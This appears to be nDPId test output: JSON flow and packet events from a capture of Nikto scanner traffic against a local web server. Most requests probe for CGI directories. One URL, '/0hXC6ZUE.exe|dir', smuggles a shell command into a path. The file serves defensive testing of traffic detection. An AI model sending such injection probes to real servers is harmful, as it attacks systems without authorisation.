+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1576420276694,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276694,"pkt":"AAAAAAAAAAAAAAAACABFAADIBvJAAEAGNTx\/AAABfwAAAcG4H5DthT7meWwMh4AYAED+vAAAAQEICp1m+v6dZvr9R0VUIC8waFhDNlpVRS5leGV8ZGlyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276694,"flow_last_seen":1576420276694,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276694,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1576420276695,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276695,"pkt":"AAAAAAAAAAAAAAAACABFAADCG\/NAAEAGIEF\/AAABfwAAAcG6H5DzUiPolNWjYoAYAED+tgAAAQEICp1m+v+dZvr\/R0VUIC9pbmRleC5waHA\/IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQoNCg=="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276695,"flow_last_seen":1576420276695,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276695,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1576420276697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276697,"pkt":"AAAAAAAAAAAAAAAACABFAADEgRRAAEAGux1\/AAABfwAAAcG8H5ABRrkFDdcmsoAYAED+uAAAAQEICp1m+wGdZvsBR0VUIC9jZ2kuY2dpLyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276697,"flow_last_seen":1576420276697,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276697,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi.cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1576420276699,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276699,"pkt":"AAAAAAAAAAAAAAAACABFAADDtolAAEAGhal\/AAABfwAAAcG+H5DlK46S3uw4X4AYAED+twAAAQEICp1m+wKdZvsCR0VUIC93ZWJjZ2kvIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KDQo="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276699,"flow_last_seen":1576420276699,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276699,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1576420276701,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276701,"pkt":"AAAAAAAAAAAAAAAACABFAADEOWhAAEAGAsp\/AAABfwAAAcHAH5CIUQFyvT1whIAYAED+uAAAAQEICp1m+wWdZvsFR0VUIC9jZ2ktOTE0LyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276701,"flow_last_seen":1576420276701,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276701,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-914\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1576420276703,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276703,"pkt":"AAAAAAAAAAAAAAAACABFAADEOclAAEAGAml\/AAABfwAAAcHCH5AyFgHRa7MhPoAYAED+uAAAAQEICp1m+wadZvsGR0VUIC9jZ2ktOTE1LyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":30,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276703,"flow_last_seen":1576420276703,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276703,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-915\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1576420276704,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276704,"pkt":"AAAAAAAAAAAAAAAACABFAADAObpAAEAGAnx\/AAABfwAAAcHEH5ArBQGh2qRxvoAYAED+tAAAAQEICp1m+widZvsIR0VUIC9iaW4vIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpjZ2kgZGlyIGNoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276704,"flow_last_seen":1576420276704,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276704,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1576420276705,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276705,"pkt":"AAAAAAAAAAAAAAAACABFAADARJ1AAEAG95h\/AAABfwAAAcHGH5BoLnyEpCdA\/4AYAED+tAAAAQEICp1m+wmdZvsJR0VUIC9jZ2kvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276705,"flow_last_seen":1576420276705,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1576420276707,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276707,"pkt":"AAAAAAAAAAAAAAAACABFAADCUelAAEAG6kp\/AAABfwAAAcHIH5DIZGoAvjYJ64AYAED+tgAAAQEICp1m+wudZvsLR0VUIC9tcGNnaS8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQoNCg=="} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276707,"flow_last_seen":1576420276707,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276707,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/mpcgi\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1576420276708,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276708,"pkt":"AAAAAAAAAAAAAAAACABFAADE7opAAEAGTad\/AAABfwAAAcHKH5CIytaS2kjlzYAYAED+uAAAAQEICp1m+wydZvsMR0VUIC9jZ2ktYmluLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNnaSBkaXIgY2hlY2spDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276708,"flow_last_seen":1576420276708,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49610,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1576420276710,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276710,"pkt":"AAAAAAAAAAAAAAAACABFAADEp+BAAEAGlFF\/AAABfwAAAcHMH5C4I5\/IUy7GWoAYAED+uAAAAQEICp1m+w6dZvsNR0VUIC9vd3MtYmluLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6Y2dpIGRpciBjaGVjaykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":35,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276710,"flow_last_seen":1576420276710,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276710,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49612,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ows-bin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:cgi dir check)"}} 